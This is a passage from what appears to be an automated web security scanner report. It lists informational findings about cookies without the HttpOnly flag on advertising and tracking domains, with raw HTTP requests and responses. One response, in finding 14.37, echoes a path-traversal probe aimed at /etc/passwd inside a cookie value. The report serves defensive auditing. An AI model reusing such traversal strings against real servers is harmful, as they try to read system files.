Set-Cookie: CMST=TmLJ305izg8C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT
Set-Cookie: CMDD=AAF1owI*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT


14.35. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035223&c3=&c4=&c5=&c6=&c15=&ns__t=1315096975227&ns_c=UTF-8&c8=Blog%3A%20Stay%20updated%20on%20Oregon-LSU%20and%20other%20college%20football%20action&c7=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&c9=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:42:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.36. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:43:15 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:43:15 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.37. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmcharlotte&d.x=221978921&d.t=page&d.u=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:08:16 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:08:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.38. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bh/rtset HTTP/1.1
Host: bh.contextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app604
Cache-Control: no-cache, no-store
Set-Cookie: V=LZLz3N9wRgPO; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 01:21:59 GMT; Path=/
Content-Length: 0
Date: Sun, 04 Sep 2011 01:21:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


14.39. http://bookmarks.yahoo.com/myresults/bookmarklet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bookmarks.yahoo.com
Path:   /myresults/bookmarklet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myresults/bookmarklet HTTP/1.1
Host: bookmarks.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:22:00 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Location: https://login.yahoo.com/config/login?.src=bmk2&.intl=us&.done=http%3A%2F%2Fbookmarks.yahoo.com%2Fmyresults%2Fbookmarklet
Set-Cookie: BM=s=jTB8wJ2La_ypD_4dYi2T3iXing3SP9.2WWYx6ZV4prGAsqH7FIEnvrDQAopmUuavjvNvoLA_bTeCAOSco_5Ah3PnDWTo_giw8qyah_q73iAkoo2jYZ6qOZyOiL5BCew6c0xSCdTbNV_7IyclnoWj&u=3fCXYyeLa_wYLv83APMX2Lbttc9K4k.mD1iQ3DrhqFxeRyTWpsjWq8byJg--; path=/; domain=.bookmarks.yahoo.com
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 294

<html><head><meta http-equiv="refresh" content="0;url=https://login.yahoo.com/config/login?.src=bmk2&amp;.intl=us&amp;.done=http%3A%2F%2Fbookmarks.yahoo.com%2Fmyresults%2Fbookmarklet"/></head></html><
...[SNIP]...

14.40. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 987
Content-Type: application/x-javascript
Set-Cookie: FFad=2:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=209
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:06 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.ze
...[SNIP]...

14.41. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=67:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=196
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:47 GMT
Content-Length: 910
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='54f5b';
...[SNIP]...

14.42. http://c7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h639958Za722607Zc305000825%2C305000825Zs263Zt1246&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h639958Za722607Zc305000825,305000825Zs263Zt1246;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1467
Date: Sun, 04 Sep 2011 01:05:03 GMT
Connection: close



14.43. http://c7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: None;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=None;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=443
Date: Sun, 04 Sep 2011 01:22:07 GMT
Connection: close



14.44. http://clk.fetchback.com/serve/fb/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315099337_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Set-Cookie: cre=1_1315099337_34024:68292:2:121174:121256; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Set-Cookie: clk=1_1315099337; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 01:22:17 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://default.com
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif


14.45. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

14.46. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /partner/js/ypn.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BX. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/js/ypn.js HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:00 GMT
Set-Cookie: BX=228g5ih765ieg&b=3&s=bh; expires=Tue, 04-Sep-2013 20:00:00 GMT; path=/; domain=.overture.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private, max-age=86400, must-revalidate
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 8564

// -- defaults --
ctxt_ad_interface_default = 'http://ypn-js.ysm.yahoo.com/d/search/p/ypn/jsads/';
ctxt_ad_width_default = 468;
ctxt_ad_height_default = 60;
ctxt_ad_partner_default =
...[SNIP]...

14.47. http://companion.adap.tv/companion/post

Summary

Severity:   Information
Confidence:   Certain
Host:   http://companion.adap.tv
Path:   /companion/post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: adaptv_unique_user_cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companion/post HTTP/1.1
Host: companion.adap.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: close
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6220387657706691463__TIME__2011-09-03+18%3A22%3A21";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:22:21 GMT
Content-Type: text/html; charset=iso-8859-1
p3p: CP="DEM"
Cache-Control: no-cache
Content-Length: 1



14.48. http://control.adap.tv/control

Summary

Severity:   Information
Confidence:   Certain
Host:   http://control.adap.tv
Path:   /control

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: adaptv_unique_user_cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A07%3A39";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:07:39 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32443

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...

14.49. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/rubicon-cms2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:44:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:44:15 GMT

GIF89a.............!.......,...........D..;

14.50. http://developers.facebook.com/plugins/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: reg_fb_ref. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
Connection: close
Date: Sun, 04 Sep 2011 01:22:23 GMT
Content-Length: 0


14.51. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: wfivefivec. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchrubicon=1; matchbluekai=1; matchaccuen=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:45 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 01:06:45 GMT
Cache-Control: private
Content-Length: 0
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
X-Version: DataXu Pixel Tracker v3
Via: 1.1 bfi061001 (MII-APC/2.1)
Content-Type: text/plain


14.52. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
